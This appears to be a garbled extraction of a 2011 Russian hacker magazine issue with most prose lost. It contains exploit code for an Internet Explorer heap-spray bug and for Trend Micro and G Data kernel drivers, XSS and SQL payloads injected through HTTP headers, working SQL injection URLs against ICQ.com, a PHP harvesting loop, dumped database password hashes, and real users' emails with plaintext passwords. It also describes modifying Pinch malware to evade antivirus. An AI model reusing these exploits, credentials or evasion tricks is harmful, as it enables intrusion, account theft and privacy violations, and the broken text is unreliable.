02

INTERNET EXPLORER (CVE2010-3962)
TARGETS:
Internet Explorer 6/7/8

BRIEF

Websense Security Labs. , IE -
041
7dcb1c33
mov
call
7dcb1c38
mov
7dcb1c31
ecx,edi
mshtml!CDispNode::
SetBackground (7dcafe4b)
eax,dword ptr [edi] ; <-- -

mov
ecx,edi
call
dword ptr [eax+30h] ; <--

7dcb1c3a
7dcb1c3c
,
object[0], 0x30 .
, , , SetUserClip
.

CSS-.
PoC-, :
<html>
<table style=position:absolute;clip:rect(0)>
</html>
- :
mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d
xor
esi,esi
7dcb1c2f
inc
esi
7dcb1c30
push
esi
042
mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0
call
mshtml!CRect::
RestrictRange (7dd89389)
7dd8b5d5
mov
eax,dword ptr [edi+4]
7dd8b5d8
and
eax,esi
7dd8b5da
movzx ecx, byte ptr mshtml!CDispNode::
_extraSizeTable (7dc31c10)[eax]
7dd8b5e1
mov
eax,edi
7dd8b5e3
shl
ecx,2
7dd8b5e6
sub
eax,ecx
7dd8b5e8
or
dword ptr [eax],1 ;<-- eax -
,
heap-spray, DEP/ASLR.
:
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
X 01 (144) 2011
function alloc(bytes, mystr) {

var shellcode = unescape(
' :) ');
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
}
</script>
</head>
<body>
<script>
alert('ph33r: click me');
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
FAKEOBJ = alloc(1294464, FAKEOBJ);
for (var k = 0; k < 1000; k++) {
evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write(
"<table style=position:absolute;clip:rect(0)>");
</script>
</body>
</html>
exploit-db.com/
exploits/15376.
SOLUTION
,
Workaround MS.
1. KB2458511.CSS:
TABLE
{
POSI\TION: relative !important;
}
2. :
regedit /e CSS-backup.reg "HKEY_CURRENT_USER\Software\
Microsoft\Internet Explorer\Styles"
X 01 (144) 2011
3. Apply_user_CSS.reg :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Styles]
"User Stylesheet"="C:\\[directory location]\\KB2458511.css"
"Use My Stylesheet"=dword:00000001
[directory location] KB2458511.

CSS
4. :).
03

TREND MICRO
TARGETS:
Titanium Maximum Security
Titanium Internet Security
BRIEF
. , ,
DeviceIoControl c IoctlCode 0x220404,
,
. / .
, Ioctl-
\\.\tmtdi-:
.text:0001DB7B loc_1DB7B:
.text:0001DB7B test dword_2289C, 10000000h
.text:0001DB85 mov
edi, [ebx+0Ch]
; edi
.text:0001DB88 jz
short loc_1DB95
.text:0001DB8A push offset aIoctrl_bind_cf
; "[IOCTRL_BIND_CFW]\n"
.text:0001DB8F call DbgPrint
.text:0001DB94 pop
ecx
.text:0001DB95 push edi ; VirtualAddress
.text:0001DB96 call esi ; MmIsAddressValid

.text:0001DB98 test al, al
.text:0001DB9A jz
loc_1DD19
043
,
NULL
sub_10CD4,
, (, , )
PageFault.
, dword_228B4 NULL,
jmp ecx ( ).
success
.text:0001DBA0 cmp
[ebp+DeviceObject], 8 ;

.text:0001DBA4 jb
loc_1DD19
.text:0001DBAA mov
eax, [edi] ; eax
4
.text:0001DBAC mov
dword_228B4, eax ;
x-refs() dword_228B4 ,
winsock bind,
, jmp
ecx, , , !
.text:00010CD4
.text:00010CD4
.text:00010CD6
.text:00010CD7
.text:00010CD9
.text:00010CDF
.text:00010CE1
.text:00010CE3
NULL
.text:00010CE5
.text:00010CE6
.text:00010CE8
.text:00010CE8
.text:00010CE8
.text:00010CE8
.text:00010CE9
.text:00010CE9
sub_10CD4
proc near
mov edi, edi
push ebp
mov ebp, esp
mov ecx, dword_228B4 ; ecx
xor eax, eax
test ecx, ecx
jz
short loc_10CE8 ;
pop ebp
jmp ecx ; !!!
; -----------------------------------loc_10CE8:
pop ebp
retn 4
sub_10CD4
endp
EXPLOIT

DeviceIoControl, bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
bind( ListenSocket, (SOCKADDR*) &service,
sizeof(service); // !
, , dword_228B4
,
044
44
DWORD WINAPI ResetPointer( LPVOID lpParam ) {

HANDLE hDevice;
DWORD *inbuff;
DWORD ioctl = 0x220404, in = 0x10, out = 0x0C, len;
DWORD interval = 500; // , !
Sleep(interval);
inbuff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
*inbuff = 0;
hDevice = (HANDLE)lpParam;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
free(inbuff);
return 0;
}
SOLUTION
Trend Micro :).
04

G DATA
TARGETS:
G Data TotalCare 2011

BRIEF
:
1.Race Condition Native API
2. Ioctl
Ioctl
MiniIcptControlDevice0.
, ,
.
Ioctl 0x83170180:
.text:00010DBC
cmp

.text:00010DC2
jz
edx, 83170180h ;<-----

loc_10EAD
[..]
.text:00010EC0
push eax ; <------ eax
4
X 01 (144) 2011
, DoFreeContext, FLT_CONTEXT ,

:
: svchost.exe
,
.text:00010EC1
call FltReleaseContext ;
WDK,
.
,
,
.
FLT_CONTEXT .
,
. ,
.
, :
Step' Windbg,
DoFreeContext: FltReleaseContext
DoReleaseContext DoFreeContext.
.text:00011F04 ; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
edi, edi
.text:00011F04
mov
ebp
.text:00011F06
push
ebp, esp
.text:00011F07
mov
esi
.text:00011F09
push
edi
.text:00011F0A
push
.text:00011F0B
mov
edi, [ebp+Entry]
.text:00011F0E
mov
esi, [edi]
; <----- edi
.text:00011F10
mov
eax, [esi+4]
.text:00011F13
test
eax, eax ;<----
NULL
.text:00011F15
jz
short loc_11F24
.text:00011F17
xor
ecx, ecx
.text:00011F19
mov
cx, [esi+0Ch]
.text:00011F1D
push
ecx
ecx, [edi+28h]
.text:00011F1E
lea
.text:00011F21
push
ecx
eax ; <-----
.text:00011F22
call

X 01 (144) 2011
.text:00012066 ; int __stdcall DoReleaseContext(PVOID Entry)

.text:00012066 _DoReleaseContext@4 proc
.text:00012066
.text:00012066 Entry
= dword ptr 8
.text:00012066
.text:00012066
mov
edi, edi
ebp
.text:00012068
push
ebp, esp
.text:00012069
mov
.text:0001206B
push
esi
.text:0001206C
mov
esi, [ebp+Entry]
eax, [esi+24h]
.text:0001206F
lea
.text:00012072
or
ecx, 0FFFFFFFFh
; <---- ecx = -1
.text:00012075
lock xadd [eax], ecx
; <----
.text:00012079
jnz
short loc_120A6
.text:0001207B
call ds:__imp__KeGetCurrentIrql@0
; KeGetCurrentIrql()
cmp
al, 2
.text:00012081
jnb
short loc_1208D
.text:00012083
.text:00012085
push
esi
; <---- esi
.text:00012086
call
_DoFreeContext@4
; DoFreeContext(x)
EXPLOIT

FLT_CONTEXT,
4 DeviceIoControl:
void craft_fake_flt_context(
char* buff,
LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;
Entry = (DWORD*)malloc(0x8);
Entry[0] = Entry; //Entry[0] == esi
Entry[1] = shellcode_addr; //[esi+4] r0 shellcode
memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}
...
craft_fake_flt_context(inbuffer, zpage);
buff[0] = inbuffer;
DeviceIoControl(
hDevice,
ioctl,
buff,
in,
buff,
out,
&len,
NULL);
SOLUTION
. ..z
045

DX http://kaimi.ru
, , ,
SQL- XSS.
,
,
272 273 . , :
.
,
,
,
. IT-, http://kaimi.
ru/quest. -:
SQL
HTML-. .

600 , 21.
,
. ,

.
, . ,
.
, , , .
help
. , !
0
: dx
: , . .
ans - , , ,
046
.
.
1
: Kaimi
: , , .
,
Google. ,
. ,
, .
- ,
. 2.
2
: Kaimi
:
. , 16 . , . ,
, ,
,
. ,
, .
ans,
X 01 (144) 2011
base64
PHP
ROM-
Hexposure

Tineye.com! , ,
Babylon.
3
: Kaimi
: ,
, . PHP-, , , ,
. dx :). !
. -,
, base64,
, eval
print
, .

, ...
,
. , , ,
. ,
, .
, if. , -
, .
true, php-,
<?php ?> ,
,
!
X 01 (144) 2011
: Kaimi
: PHP, 4.
ROM Dendy, Kaimi.
, , ,
.
, ,
. ... Kaimi - ROM
, , , !
: Hex-, ( "" <-> "").
Hexposure.
ROM Nesticle, ,
- (, ).
,
.
.
, :
80=0
81=1
8A=A
...
tbl. ROM,
Hexposure,
.
ROM, ,
.
,
, .
, - :).
047
Perl
, XOR BY 0X03. , XOR,

. , , , , ,
, , ,
,
. , PHP :
<?php
$string = ' ';
for($i = 0, $len = strlen($string); $i < $len; $i++)
print chr(ord($string[$i]) ^ 0x03);
?>
,
.
5
: Kaimi
: -, ,
Perl. ,
, . , ,
eval print - .
, lame,
,
. "369Y9RLj73Y
WTiX4W7D7460Wxj1Kkp4b6f7A4mbTWmw5sfnAnmHEZUA3VndW" ^
"CDP7Mrn6Yp631SxV6M-YSWl9ZJX-CTu0q0lqiMDrwI6g405q3M4zr1D8IMl" , - ,
XOR. , print, pl, : print "\
nCode: bazinga\n" if($ARGV[0] && $ARGV[0] eq 'pwn').
, bazinga.
6
: dx
: . ,
,
. ,
,
. , . , , . ,
,
1000, .
7
: dx
: C++. ,
, .
:
#include "windows.h"
void main()
{
DWORD ans = 0;
048
char pass[] = {'T', 'r', 'o', 'l',

'o', 'l', 'o', 0};
int (*lol)(const char*, ...) = printf;
/* printf,
.
, ,
#include "stdio.h".
#include "windows.h" */
for(char * i = pass; *i != 0; *i ^= *(i+++1));
for(size_t i = 0, i < 8; ans += pass[i++]);
// i = 0

lol("%X\r\n", ans *= 2)
//

}
17C.
8
: Kaimi
: SWF- .
, . ? Media
Player Classic .
-
flash, , Sothink SWF Decompiler
28.
9
: dx
: , - .

.
.
10
: dx
: . rar- 500.rar,
499.rar, 498.rar, 0.rar,
. ,
( ,
, ). , .
:
@echo off
for /L %%i in (500,-1,0) do call :arch %%i
exit /b
:arch
set a=%1
rar x -r -pspielberg %a%.rar
del %a%.rar"
exit /b
WinRAR,
500.rar; password.txt
.
X 01 (144) 2011
11
: dx
: . ,
, ,
. - ,
(, SoundForge), .
12
: Kaimi
: .
, ,
. , , QR-,
, Tineye
Google,
, , , qc,
. - QR- (, zxing.org/w/decode.jspx), RAR!.
rar, WinRAR , ,
, , !
RAR-,
, ? ,
PNG- ,
, , . WinRAR
, ,
.
13
: dx
: .
, . , , exe
(, , ..). . , , Resource Hacker,
, .
14
: dx
: , ,
X 01 (144) 2011
.
: ,
, ASCII-
, ,
,
.
, . ,
. ,
4. , .
15
: Kaimi
: , , ,
, .
exe-, - . ,
. ,
: NES US 89. , ,
NES 1989 .
, , ,
.
NES (ru.wikipedia.org/wiki/___NES/).
1989 , ,
, Ninja Gaiden. exe
, , ,
.

.

! ,
, , . , , ;
Kaimi ,
: kaimi.ru/quest_x2/.
, !
, , ,
, , ,
:).
! z
049

uage
t-Lang
HTTP-
, HTTP-
, , ,
- . ?
?
,
. HTTP (HyperText Transfer Protocol ) - ,
-. WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) .
.
: ,
. ,
/ .
IP ( ). ,
, .
, ,
. -
Proxomitron.
, . HTTP-.
Proxomitron ,
.
050
.
Headers :
, ,
New. , out.

.
Mozilla Firefox . Tamper Data
. :
, .
.
Modify Headers.
Always on, .
. (Add , Modify , Filter ),
, ;
. , .

, / .
web-. ,
.
X 01 (144) 2011
ie
Accep
r
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
t-Lang
Accep
X-
Fo
rw
Ref
ar
ere
de
d-
Fo
uage
Wergon
uage
t-Lang
Co
ok
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
Accep
uage
t-Lang
r
Fo
dde
ar
rw
Fo
X-
User-Agent
cx75planet.ru
HP-include , . , ,
. , .
XSS ,
.
,
. XSS
Referer ( ), ,
( %xx).

, Referer.
,
.
XSS . , , , , .
SQL- . , , , .
PHP- ,
. .
, GET POST .
, , .
.
:
">. , . '"><script>alert(document.
cookie)</script>.
; , , , <?'?>
.
(
),
, . ,
?
document.cookie 1.

.
,
.
User-Agent
.
: , , , , .
,
:
X 01 (144) 2011
Modify Headers
/ (; ; ,
[; - ]) []. X11 Windows,
, .
: N (None) , I
(International) 40 ,
U (USA) 128 .
.
, , . Mozilla,
. , ( )
(World
Wide Web Consortium, W3C), ,
.
, , ,
JavaScript (,
Invision Power Board,
2.3.x,
). User-Agent
.
Referer
, .
, - . Referrer ().

, -, ,

.
,
, ( ,
).
, URL , ,
http://evil, http://example.com/evil ..
X-Forwarded-For
, -
HTTP://WWW
links
tools.ietf.org/
html/rfc2616 RFC
HTTP/1.1
2ip.ru/
proxomitron.ru/

Proxomitron'
addons.mozilla.org/
ru/firefox/addon/966/
Tamper Data
addons.mozilla.org/
ru/firefox/addon/967/
Modify Headers
useragentstring.com/
User-Agent
051
uage
t-Lang
The Proxomitron.
, ,
.
.
The Proxomitron.
IP .
IP, ,
, IP , X-Forwarded-For.
,
XFF, .
- (, , ,
IP ,
). : X-Forwarded-For: client_ip, proxy1_ip, ...,
proxyN_ip.
Accept-Language
,
. . ,
,
.
. , ,
.
Accept-Charset
. , ,
windows-1251.
X-Requested-With
, .
JavaScript . AJAX (Asynchronous
Javascript and XML) ,
XMLHttpRequest.
Authorization
,
, .
Authorization Basic
base64(user:pass). ,
,
(POST).
Cookie
, () .
: ,
. ,
.
, . , .
052
User-Agent: Opera/10.60 '"><script>alert(document.

cookie)</script>
Referer: http://'"><script>alert(document.cookie)</
script>
X-Forwarded-For: 127.0.0.1'"><script>alert(document.
cookie)</script>
Accept-Language: en,en-US;q=0.9
Authorization: Basic MScyMzo0JzU2
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=!
, , . ,
Accept-Language,
. Authorization , .. , -
. X-Requested-With Cookie ,
. PHP :
, PHPSESSID ( ,
, , ). ,
a-z, A-Z, 0-9 '-,',
- ,
:
Warning: session_start() [function.session-start]:
The session id contains illegal characters, valid
characters are a-z, A-Z, 0-9 and '-,' in /var/www/
data/www/login.php on line 2
, . , -
(), .
.
: , - (,
, ,
), Referer.
, ,
, ...
XSS FeedBurner,
RSS- .
Referer.
raz0r.name/vulnerabilities/
aktivnaya-xss-na-feedburner/ (wp.me/pft5J-4a) ( , - XFF :)).
X 01 (144) 2011
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
t-Lang
Accep
ar
rw
Fo
X-
Ref
ere
de
d-
Fo
uage
uage
t-Lang
Co
ok
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
Accep
uage
t-Lang
r
Fo
dde
ar
rw
Fo
X-
The Proxomitron.
Tamper Data
DLE (DataLife
Engine), DLE Referer Module (
) . ICQ UIN MySQL-,
,
, .
php.ru
Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,I
PS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62
','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/',
'a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')
cx75planet.ru. User-Agent XFF. IPB

. ,
SQL- ,
, ..
:).
PHP
, SQL-
. , , ,
. GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/
showmeheaders.php', $headers);
echo $html;
PHP
( DVD):
X 01 (144) 2011
Tamper Data
. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()
:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);
Curl
curl : curl_setopt($ch, CURLOPT_
HTTPHEADER, $headers);
,
.
JavaScript, Flash ,
. NoScript
AdBlock. ,
, . ! z
053

M4g icq 884888, http://snipper.ru
DST
AOL
ICQ: ,,
ICQ
2010
ICQ IM DST AOL.
187 .
,
.
Changes
icq.com - 2010 .
.
, https://icq.com/password, ,
UIN ,
. , email' . ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,

.
:
1. ;
2. / ;
3. ,
, ;
4.
.

.
, - .
054
, email for login -

, ,
,
, .
:
/
, . ,
, - ,
:).
, -
555555558
. ,
https://icq.com/register
,
,
.
,
ICQ.com (
) search.icq.com (
mail.ru), ,
http://www.icq.com/wit/
:).
- icq.
com.
X 01 (144) 2011
HTTP://WWW
links
ICQ ABV.bg
,

ICQ.
:
1. https://icq.com/password,
;
2.

click here;
3. ,
click here :
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1
,

mail@partner_icq.com.
,
.
, 2010 .
() .

.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3. ,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.
ICQ.com
(https://forum.antichat.ru/showthread.
php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group X 01 (144) 2011
SQL- blogs.icq.com
) - ICQ.com
(msgboard_u_ro@64.12.164.91 ,
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 S00pY Snipper.Ru.

,
( ).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+
mysql.
user:
localhost:root:*B3A0E433E7AD0F00794196F3C293
1CD66AA89796
%:msgboard_u_rw:*7FBD912E113CF606E410F18C967
487CE935ACFAC
%:scout:*9FD2B52556065163308826C11DD588A6F3
F2ED9E
%:repl:*90414724CBFFFE7B4880631D5E9E7232
C4737680
%:mydbm:*A9C391720DC3B218CD5EFEDFEDB8C55602
EFE2FE
%.aol.com:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
localhost:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
%:ping:*75E75A54E1CF941C40965FD3C39B1937910
2B07B
%:argus:*F5A7D854E9C46784C82EFC0DAE973F6170
3A7224
%:nocdba:*2D48BF42A42234DBBCADDFA0F94C9ED46
0BD1567
%:repcheck:*B58082AC1A96B8580F828E2C730A4E9
1A26DE3B0
%:msgboard_u_ro:*F1D9E0F8627E5AD39CF98BFC58E
344CF4CCACAB4
localhost:repcheck:*B58082AC1A96B8580F828E2C
730A4E91A26DE3B0
icqwebmsdb-d05.db.aol.com:repcheck:*B58082AC
1A96B8580F828E2C730A4E91A26DE3B0
http://forum.
asechka.ru

.
http://www.icq.com/
en.html

ICQ.com.
http://snipper.ru/
view/23/sql-inekciyana-blogsicqcom/
SQL-
blogs.icq.com.
http://snipper.ru/view/27/
vozvrashhenieugnannogo-nomeraicq/

ICQ.
http://www.rnspdf.londonstockexchange.com/
rns/7389V_
-2010-11-5.pdf
- DST

IPO.
http://russia.
blog.nimbuzz.
com/2010/11/09/
icq-ne-rabotaet-vnimbuzz/
ICQ
Nimbuzz.
055
ICQ.com
SQL- icq.com/greetings
Mail.ru ICQ.com
select null,@@version,null,null,null,null,null,null
,1,null,null,null,null,null,null,null,null,null,nul
l--/

msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...
, ,
blogs.icq.com , , SQL :).
2010 ICQ-, , blogs.icq.com

.
:). SQL- :
http://www.icq.com/greetings/cards/-1111+union+select
+1,concat(user(),0x3a,version(),0x3a,database()),3,4,
5,6,7+from+mysql.user+limit+0,1+--/send/
-- :
http://greetings.icq.com/greetings/cards/-253 union
056
, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date

, , , icq.com/register ! ,

, , ! ,
, :
1. ;
2. registration_temp;
3. .
:
<?php
...
while(1)
{
$a = send_data('GET','http://www.icq.com/
greetings/cards/-1111+union+select+1,count(regstr_
id),3,4,5,6,7+from+registration_temp+--/send/');
$count = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
$a = send_data('GET','http://www.icq.com/
X 01 (144) 2011
. icq.com/wit
ICQ.
com
Yandex ICQ
greetings/cards/-1111+union+select+1,concat(regstr_
id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_
lname,0x3a,regstr_email,0x3a,regstr_
password,0x3a,regstr_bdate,0x3a,regstr_
question,0x3a,regstr_answer,0x3a,regstr_
nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,
6,7+from+registration_temp+limit+'.($count-1).',1+--/
send/');
$log = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
logger($log);
}
?>
, , ,
:). :
12495211:1:Samira.:x3:dadidux33@web.
de:pudding2:1992-12-04 00:00:00:::Samira. x3:0:201011-15 12:30:53
12495219:1:Ivo:Geckovski:sfors_ivo@abv.
bg:a1b2c3d4:1985-03-27 00:00:00:::Ivo
Geckovski:0:2010-11-15 12:30:55
12495225:1:Madlen:Schwarz:Madlenschwarz85@
web.de:bier85:1985-02-05 00:00:00:::Madlen
Schwarz:1006:2010-11-15 12:30:58
12495235:0:Di:Karnavala:di_posh@nxt.
ru:345562iv:1987-04-24 00:00:00:::Di
Karnavala:-2:2010-11-15 12:31:00
12495247:1:Hellow:Kitty:kiska999-85@yandex.
ru:389162aa:1985-05-12 00:00:00:::Hellow
Kitty:3:2010-11-15 12:31:03

- ICQ.com.

https://www.icq.com/register/email_attach.php
X 01 (144) 2011
( https://www.icq.com/
karma/login_page.php ).
, - ICQ.com
, ,
,
- .
,
:). .
, :
, ,
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php),
;
, , .
https://www.icq.com/register/email_attach.php.
- , html- :).
,
( ICQ.com):
1. html-:
<form action="http://icq.com/people/include/xhr.php"
method="POST">
<input name="f" value="resendMail"/><br/>
<input name="e" value="_@.ru"/><br/>
<input name="lang" value="en"/><br/>
<input name="server" value="prod"/><br/>
<input type="submit" value="ok"/><br/>
</form>
2. ;
3. email for login;
4.
https://icq.com/password :).
,
.
,
ICQ .
-,
ICQ,
.
, -

, ,
, . .
:).z
057

"Cr@wler" crawler@xakep.ru

,
,
malware-.
,
.

, , . -, -
Pinch (
, ).
,
-
( , ,
RAR- DVD).
058
VMWare Windows XP (
, ).
, OllyDbg, WinHex,
PE- LordPE. , ,
virustotal.com . , ,

, .
,
X 01 (144) 2011

. . , .
!

.
. , XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. . , :
13147C30
13147C31
13147C36
13147C3C
13147C3F
13147C45
13147C47
13147C48
PUSHAD
MOV ECX,6C2F
MOV EDX,DWORD PTR DS:[ECX+13141000]
XOR EDX,76
MOV DWORD PTR DS:[ECX+13141000],EDX
LOOPD SHORT pinch_pa.13147C36
POPAD
JMP SHORT pinch_pa.13147810
( ,
copy to executable-all modifications,
Save file). , , LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . . ! . virustotal.com,
. , 31
43 ( 42 43)! .
.
,
. , ,
( - -
,
2009 ).
X 01 (144) 2011

13147C4B XOR EAX,EAX;
13147C4D PUSH pinch_pa.13147C62;

13147C52 PUSH DWORD PTR FS:[EAX];

13147C55 MOV DWORD PTR FS:[EAX],ESP;
FS:[0]
13147C58 CALL pinch_pa.13147C58;

13147C5D JMP pinch_pa.13145555;

13147C62 POP EAX;
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810;
:

13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),

. , , ,
. ,
( 27 43
).
, ?
.
, , ,
,
. ,
,
. ,
, !
,
, (
).
13147C90 , ,
(4Ch ,
13147C30). ,
. ,

059
OllyDbg , OEP

,
.
. , ! ,
: , 13140002,
:
13147C90 - NEW OEP

length of code 4c
13147c30 - start of code
13147c7c - end of code
13140002
EB 24
JMP SHORT 13140028
, 13140028, :
13147C90
60
13147C91
B9 4C000000
13147C96
8B91 307C1413
DS:[ECX+13147C30]
13147C9C
83F2 54
13147C9F
8991 307C1413
DS:[ECX+13147C30],EDX
13147CA5
Ê2 EF
kadabra_.13147C96
13147CA7
61
jmp 13147c30
PUSHAD
MOV ECX,4C
MOV EDX,DWORD PTR
XOR EDX,54
MOV DWORD PTR
LOOPD SHORT
POPAD
,
, .
. , , PE-, ImageBase,
. . WinHex , : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000
13140001
13140002
13140004
4D
5A
0000
0100
DEC
POP
ADD
ADD
EBP
EDX
BYTE PTR DS:[EAX],AL
DWORD PTR DS:[EAX],EAX
...
13140028
0000
ADD BYTE PTR DS:[EAX],AL
,
. , ,
MZ-,
, . ,
. 13140028.
060
13140028
-E9 637C0000
JMP 13147c90
, LordPE
EntryPoint. , , :
25 43 .
, ,
.conf .data ,
. .
,
OllyDbg , ,
! , , image base.
Image base , ,
.
Lost in Time, Dr. Web,

: ,
15- .
, ,
15000 , . , - ,
. , ,
-
, API-,
. ? .
,
. ,
,
. ,
. ,
. ,
, API- GetLocalTime, X 01 (144) 2011
:
:)
16-
:
typedef struct _SYSTEMTIME {
WORD wYear;
WORD wMonth;
WORD wDayOfWeek;
WORD wDay;
WORD wHour;
WORD wMinute;
WORD wSecond;
WORD wMilliseconds;
} SYSTEMTIME;
//
//
//
//
//
//
//
//
, , GetLocalTime,
, , , 13147D7D
13147D94. Sleep(), Kernel32,
, , , . , :
13147CFA PUSH kadabra_.13147D7D;

13147CFF CALL kernel32.GetLocalTime;

13147D04 PUSH 3E8; 1000 , 1
13147D09 CALL kernel32.Sleep;
13147D0E PUSH kadabra_.13147D94;

13147D13 CALL kernel32.GetLocalTime;

16-
, , , :
[][][ ][ ] []
[] [][]
13147D7D: DA 07 0A 00 02 00 0C 00 0D 00 0C 00 31 00
B1 03
13147D94: DA 07 0A 00 02 00 0C 00 0D 00 0D 00 04 00
B1 03
: , X 01 (144) 2011
,
Dr. Web
. 1 ,
, ,
[13147d7d+] [13147D94+],
( ).
, . ?
.
( , , ),
, :). , :
13147CF9 ; (
)
13147D18 MOV AL,BYTE PTR DS:[13147D89]; AL
13147D1D MOV AH,BYTE PTR DS:[13147DA0]; AH
13147D23 SUB AH,AL;
13147D25 XOR EBX,EBX; EBX
13147D27 MOV BL,AH; EBX
13147D29 ADD EBX,13147C29;
13147D2F JMP EBX;
, , ,
EBX, 13147C30. , , , .

: Dr. Web ! :).

. 22 43
- .
, , -
. , ,
, , :
. ,
,
virustotal .
, , , , ,
. ,
, -, TLS. ?
, .
, TLS- ,
,
061
25%
, . , callback-
.
, TLS (Thread Local Storage)-callback-
( , TLS ,
),
, , . Callback
, OEP.
,
, ,
PE-.
TLS-
( callback- ).
, , .

.

(13147d80 13147d90), .text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d
14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( ).
TLS-.
13147da0, 6 ,
Binary Edit. 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :
062
13147DB0 PUSHAD;
13147DB1 MOV ECX,6D2F;
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];
DH
13147DBC XOR DH,CL;

13147DBE MOV BYTE PTR DS:[ECX+13141000],DH;
13147DC4 LOOPD SHORT 13147DB6;
13147DC6 POPAD;
13147DC7 RETN;
, , , ,
-
OllyDbg.
TLS-
PE-. LordPE TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback !).
virustotal.com.
18 43 ! , ,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe
.

. , .
! z
X 01 (144) 2011
>> coding
http://lotus.xakep.ru
X-testing ontest
IBM Lotus Symphony 3. ,
Lotusphere, 2011 .
cr@wler
10
Lotus Symphony
Lotusphere-2011.
zenit80 .

(Digital Security, dookie@inbox.ru)
(CISS Research Team)
(CISS Research Team, twitter.com/Ntarakanov)
dangertrace.log
conditional jumps
invertation
trace.log
avalanche
driver
tracegrind
input +
executable
heuristeic value,
errors
input +
executable
danger conditions
checking
STP
new input
values
covgrind
Avalanche

, ,
Microsoft,
. ,
. .
, .
...
Fuzz me baby one more time!
138 ( 2010 ) Step

,
. ,
,
( , )
- , , ,
-. , ,
, -.
- ,

,
. ,
,
,
064
( , ),
. , ,
- ,
, :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
, :
+----+-------|FFFF|61626364...
+----+-------X 01 (144) 2011
In Memory Fuzzing.
IDA
In Memory Fuzzing.
...
| "abcd..."
+----+-------+----+--------+
|0004|25XX25XX|
